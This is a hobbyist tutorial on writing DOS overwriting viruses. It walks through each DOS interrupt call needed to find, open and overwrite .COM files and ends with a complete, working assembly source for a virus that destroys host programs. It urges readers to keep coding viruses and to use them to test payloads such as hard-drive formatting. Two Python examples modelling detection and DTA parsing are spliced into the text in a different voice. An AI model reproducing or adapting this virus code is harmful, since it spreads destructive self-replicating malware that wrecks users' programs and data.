                        /\---/\      RATBOY'S OVERWRITING VIRUS TUTORIAL
                       ( . . )
                        \   /        WARNING: The information contained within here
                         \ /         ^^^^^^^  can be dangerous to your mind and
                          \*/                 computer!!!!!!!!
                                              I assume no responsibility!!!!!!!!!

Well here it is, my first instructional tutorial. I felt it was necessary to
write this file since I could not find any tutorials that taught virus
writing from the basic overwriting virus. Well, that's how I started, and now
I want to show you, so that you too can have a long and fruitful life of
coding viruses. :)

OVERWRITING VIRUSES

-=What is an overwriting virus?

I'm glad you asked that. :) An overwriting virus is a virus that reproduces
by overwriting the first part of a program with itself. Here is an example:

        +-------------------------+      (I got this example from
        |    P R O G R A M        |       40Hex, thanks P/S!!!!)
        +-------------------------+
 plus:
        +--------+
        | VIRUS! |
        +--------+
 equals:
        +--------+----------------+
        | VIRUS! |  G R A M       |
        +--------+----------------+

As you can see, the first part of the program was overwritten with the virus
code. Since important parts of the original program are effectively
destroyed, it won't ever run, but the virus code will. As you can guess,
overwriting viruses are very destructive and not very productive. But you
must learn to walk before you can do the Polka!!

-=So what does one need to know to write an overwriting virus?

Another question I'm glad you asked. :) Well, having a basic knowledge of
Assembly is a must, but it is not very difficult. As a virus writer, I only
know one programming language, Assembly. I didn't even learn BASIC. So don't
listen to those that say don't learn Assembly; it's a wonderful programming
language. At the end of this file I'll be recommending books and things to
do to help ya on your way to Assembly and virus writing. Well, let's get
down to coding!!!! :) We will be dealing with .Com files.
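To make the diagram above concrete from the defender's side, here is an added Python example (not part of the original tutorial) that models the overwrite on constructed in-memory .COM images and shows the two checks a scanner or integrity monitor would use: a prefix signature match against the known virus body, and a hash comparison against a known-good copy. It also shows why a file-size check alone is not enough: when the virus is shorter than the host, the file keeps its size.

```python
import hashlib

# Constructed sample bytes: a stand-in for the virus body and two host programs.
# (Nothing here is real machine code; the values only model the byte layout.)
VIRUS_BODY = b"VIRUS!"
HOST_LONG = b"P R O G R A M"          # longer than the virus: tail survives
HOST_SHORT = b"PROG"                  # shorter than the virus: file grows


def overwrite_infect(host: bytes, virus: bytes) -> bytes:
    """Model of the overwrite: the virus replaces the first len(virus) bytes
    of the host, and whatever lies beyond that is left untouched."""
    return virus + host[len(virus):]


def prefix_signature_match(image: bytes, virus: bytes) -> bool:
    """Signature check: an overwriting virus always sits at offset 0,
    so a scanner only has to compare the file prefix with the known body."""
    return image[:len(virus)] == virus


def integrity_changed(image: bytes, known_good_sha256: str) -> bool:
    """Integrity check: compare against a hash taken while the file was clean.
    This catches the infection even when no signature is known."""
    return hashlib.sha256(image).hexdigest() != known_good_sha256


def infection_report(host: bytes, virus: bytes) -> dict:
    """Run the checks on a clean host and on its infected copy."""
    baseline = hashlib.sha256(host).hexdigest()
    infected = overwrite_infect(host, virus)
    return {
        "infected_image": infected,
        "size_changed": len(infected) != len(host),
        "signature_hit": prefix_signature_match(infected, virus),
        "integrity_hit": integrity_changed(infected, baseline),
        "clean_signature_hit": prefix_signature_match(host, virus),
    }


if __name__ == "__main__":
    for name, host in (("long host", HOST_LONG), ("short host", HOST_SHORT)):
        r = infection_report(host, VIRUS_BODY)
        print(name, r["infected_image"], "size changed:", r["size_changed"],
              "signature:", r["signature_hit"], "integrity:", r["integrity_hit"])
```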
So here is the basic setup for a .Com file in an Assembly source file:
-----------------------------------------------------------------------------
CODE    SEGMENT
        ASSUME  CS:CODE,DS:CODE         ;in .Com files the data, code, extra
                                        ;and stack segments are all the same.
        ORG     100H                    ;this is where all .Com files start
                                        ;in memory. This allows room for the
                                        ;PSP.
STARTVX PROC    NEAR
        blah!                           ;all your virus body goes here
        blah!
        blah!
STARTVX ENDP
        blah!                           ;all your 'db's go here etc..etc...
CODE    ENDS
        END     STARTVX
-----------------------------------------------------------------------------

See, the setup isn't really hard to follow, but the lack of info in that
example can be confusing. We'll get to a full virus source code a little
later. Now what is the basic setup for a simple overwriting virus? Well,
let's look at the order of operations:

        (1) find a file
        (2) open the found file
        (3) write the virus to the opened file (infect it)
        (4) close the file
        (5) exit

Well, as you can see, there is nothing but pure replication functions in
this setup. I wanted it to be easy and not to bog you down with encryption,
id bytes, etc... We are dealing with ZEN and the art of basic viruses! Here
we go looking at these steps of a simple overwriting virus:

(1) FIND FIRST FILE!
 the inputs:
        AH: 4EH
        CX: FILE ATTRIBUTES
        DX: OFFSET ADDRESS OF FILE NAME
        DS: SEGMENT ADDRESS OF FILE NAME

Now let's see how we would put this into our little program:

        mov     ah,4eh                  ;find first service
        mov     cx,0000h                ;we 0'ed cx for normal files
        mov     dx,offset star_com      ;the file mask for .Com files,
                                        ;you'll see
        int     21h
;now of course when you said star_com you need to tell the Assembler what
;you are talking about. Here it is:
star_com:       db      "*.com",0
;ya see how it will work. With the use of the wild card '*' the first file
;that has the ending of .com will be found. This is easy, isn't it?

Now you can see that we didn't need to touch DS, since CS=DS=ES=SS. So
star_com already was in the Data Segment. Yay!!!!! Love em .Com files.
Sorry, need to get back on track. Now before we can go on and talk about
opening a found file for writing to (infecting), we must talk about the Disk
Transfer Area (DTA). When you find that first file, information about the
file found goes into the DTA, everything from file name to date of creation.
Here's the setup:

        0h      db      21 dup(0)       ;reserved for DOS uses
        15h     db      00              ;file attributes
        16h     dw      0000            ;file time
        18h     dw      0000            ;file date
        1ah     dd      00000000        ;file size
        1eh     db      13 dup(0)       ;asciiz of the file name.

That is the layout of the DTA. Now the DTA lies in the PSP, the first 256
(100h) bytes in front of the .Com file. Its address is 80h. Most of the time
in virus writing you would want to move the DTA to a location where you can
manipulate it without possibly messing up the PSP. Well, for our case, with
a simple overwriting virus, we don't need to worry. All we are going to do
is read from the DTA the file name we have just found. Now this is how we
will address the file name: we know that the DTA starts at 80h, and we know
that at 1eh from the DTA's beginning is the asciiz of the file name. So we
just add them together and see what we get, 80h + 1eh = 9eh. Well, that is
where it's located, now let's move on to the next step.

(2) OPENING THE FOUND FILE!
 the inputs:
        AH: 3DH
        AL: 00H                 ;opened for reading only
            01H                 ;opened for writing only
            02H                 ;opened for both reading and writing
        DX: OFFSET ADDRESS OF THE FILE NAME
        DS: SEGMENT ADDRESS OF THE FILE NAME
 outputs:
        AX: FILE HANDLE

Now look at it set up in the format we need to know.

        mov     ah,3dh                  ;open file
        mov     al,02h                  ;open it for reading and writing
        mov     dx,9eh                  ;remember, this is where the name
                                        ;in the DTA is
        int     21h

Now DOS services will return a file handle of the file we just opened. The
file handle is nothing more than a number that DOS uses to know where it
will read from (the file) or write to (the file). We don't want it in AX,
since in the next step, as you will see, we need it in BX.
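As an added example (not from the tutorial), here is a Python parser for the 43-byte find-first DTA record laid out above, run on a constructed record, together with the 80h + 1eh = 9eh offset arithmetic the text does by hand. The DOS packed time/date formats it decodes are the standard ones (time: hours<<11 | minutes<<5 | seconds/2; date: (year-1980)<<9 | month<<5 | day); this is the kind of decoding a forensic analyst does when reading such structures out of a memory or disk image.

```python
import struct

PSP_DTA_OFFSET = 0x80          # default DTA lives at PSP:80h
DTA_NAME_OFFSET = 0x1E         # asciiz file name inside the DTA
DTA_SIZE = 0x2B                # 21 + 1 + 2 + 2 + 4 + 13 = 43 bytes


def decode_dos_time(packed: int) -> tuple:
    """DOS packed time: bits 15-11 hours, 10-5 minutes, 4-0 seconds/2."""
    return (packed >> 11) & 0x1F, (packed >> 5) & 0x3F, (packed & 0x1F) * 2


def decode_dos_date(packed: int) -> tuple:
    """DOS packed date: bits 15-9 years since 1980, 8-5 month, 4-0 day."""
    return 1980 + ((packed >> 9) & 0x7F), (packed >> 5) & 0x0F, packed & 0x1F


def parse_dta(record: bytes) -> dict:
    """Parse one find-first/find-next DTA record into its fields.
    Layout (little-endian, as in the tutorial): 21 reserved bytes, attribute
    byte at 15h, time word at 16h, date word at 18h, size dword at 1Ah,
    13-byte asciiz name at 1Eh."""
    if len(record) < DTA_SIZE:
        raise ValueError("DTA record too short: %d bytes" % len(record))
    attr, ftime, fdate, size = struct.unpack_from("<BHHI", record, 0x15)
    raw_name = record[DTA_NAME_OFFSET:DTA_NAME_OFFSET + 13]
    name = raw_name.split(b"\0", 1)[0].decode("ascii")
    return {
        "attributes": attr,
        "time": decode_dos_time(ftime),
        "date": decode_dos_date(fdate),
        "size": size,
        "name": name,
        "name_address_in_psp": PSP_DTA_OFFSET + DTA_NAME_OFFSET,  # 0x9E
    }


def build_sample_dta() -> bytes:
    """Constructed sample record (not captured from a real machine):
    a 1234-byte archive-flagged file named TEST.COM, 1995-03-17 13:45:30."""
    ftime = (13 << 11) | (45 << 5) | (30 // 2)
    fdate = ((1995 - 1980) << 9) | (3 << 5) | 17
    return (b"\0" * 21 + struct.pack("<BHHI", 0x20, ftime, fdate, 1234)
            + b"TEST.COM".ljust(13, b"\0"))


if __name__ == "__main__":
    for key, value in parse_dta(build_sample_dta()).items():
        print("%-20s %r" % (key, value))
```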
Here's an easy way to move it:

        xchg    bx,ax                   ;that will put the file handle into
                                        ;bx in one step!!!

Ok, now the down and dirty stuff. Infecting the file we just opened. Ha ha!

(3) WRITING TO THE OPENED FILE (INFECTING)
 the inputs:
        AH: 40H
        BX: FILE HANDLE
        CX: BYTES TO WRITE
        DX: OFFSET ADDRESS OF THE BEGINNING OF THE VIRUS

Here we go again with seeing what it will look like:

        mov     ah,40h
        mov     cx,offset endvx - offset startvx    ;this will find the virus
                                                    ;length, how many bytes to
                                                    ;write....
        mov     dx,offset startvx                   ;where the virus starts
        int     21h

Ahhhhhhhhh! I always feel so relaxed after reproducing....ahh.hh...h!
Oh... where was I? A... well, now that we have copied the virus to the file,
we can close it up.

(4) CLOSE THE FILE!                     ;Whata-ya live in a barn!
 the inputs:
        AH: 3EH
        BX: FILE HANDLE

Now before we go on, remember how after we opened the file we put the file
handle in BX. So since we didn't mess with BX we should just have to:

        mov     ah,3eh
        int     21h

Now for the final and last step, the exiting. Here ya go:

(5) EXIT!

        int     20h

Well, I know it isn't really pretty, but it works. Let's look at how all of
it fits together:
-----------------------------------------------------------------------------
Code    Segment
        Assume  CS:code,DS:code
        Org     100h
startvx proc    near
        mov     ah,4eh
        mov     cx,0000h
        mov     dx,offset star_com
        int     21h
        mov     ah,3dh
        mov     al,02h
        mov     dx,9eh
        int     21h
        xchg    bx,ax
        mov     ah,40h
        mov     cx,offset endvx - offset startvx
        mov     dx,offset startvx
        int     21h
        mov     ah,3eh
        int     21h
        int     20h
startvx endp
star_com:       db      "*.com",0
endvx   label   near
code    ends
        end     startvx
-----------------------------------------------------------------------------

Sorry I didn't put comments in, but that was done on purpose: if you can not
read along and follow what is going on, you need to re-read this file and
practice more Assembly.

-=Now that I know overwriting virus programming, what can I use them for?

Another fine question. :) Overwriting viruses are simple, and being simple
they are fairly easy to follow and program.
That in itself will help educate you in the basics of a virus: writing,
reading, finding files, etc.... Also, since it's fairly easy to write up an
overwriting virus, you can use them as test platforms for other routines:
formatting HDs, visual displays, encryption, etc..... This is so that you
can concentrate on how the test routine will work, not the virus.

-=Now that I have the basics, is that all I need?

OH No, there are many things that you need, the knowledge being the hardest.
Read Assembler Inside and Out, and Using Assembly; they're really good
books. You need an Assembler (A86+TASM), and lots of source codes to learn
from (some included). It just doesn't stop there; you will need some really
good virus scanners to track what your virus is doing. F-prot and Tbav are
great, but if you come up with a virus that is unscannable they won't work.
That's why I highly recommend INVIRCIBLE. It will protect you from real
screw ups, track your virus movement, even unscannables, even protect you
from your 'friends' viruses on your computer >:>. It's the best anti-virus
protection out there; you need to know your enemy, and it's a powerful
tool. The biggest and most important thing you can have is people that are
helpful enough to take the time to answer the questions that form in your
mind. You will see some of those people in the closing credits of this
file. Talk to them. Now you are on to a long and fruitful life of making
your own viruses. Remember: practice, ask questions, read and of course
have fun!!!!!!!

*****************************************************************************

Now I would like to take the time to thank a few people:

-=*God, for making me possible
-=*My Wife, for putting up with me!!
-=*FC, thanks for all the info and help, dude!!!
-=*Invircible, yea I know it's a piece of software, but it has covered my
   butt enough times. Thanks Mike!!!!!!!!!!!!!!!!!
-=*Aristotle, yea Aristotle, the dude helped start me out.
-=*Vlad, Immortal Riot, NuKE, Falcon, P/S, Mad Arab, Terminal Velocity..etc..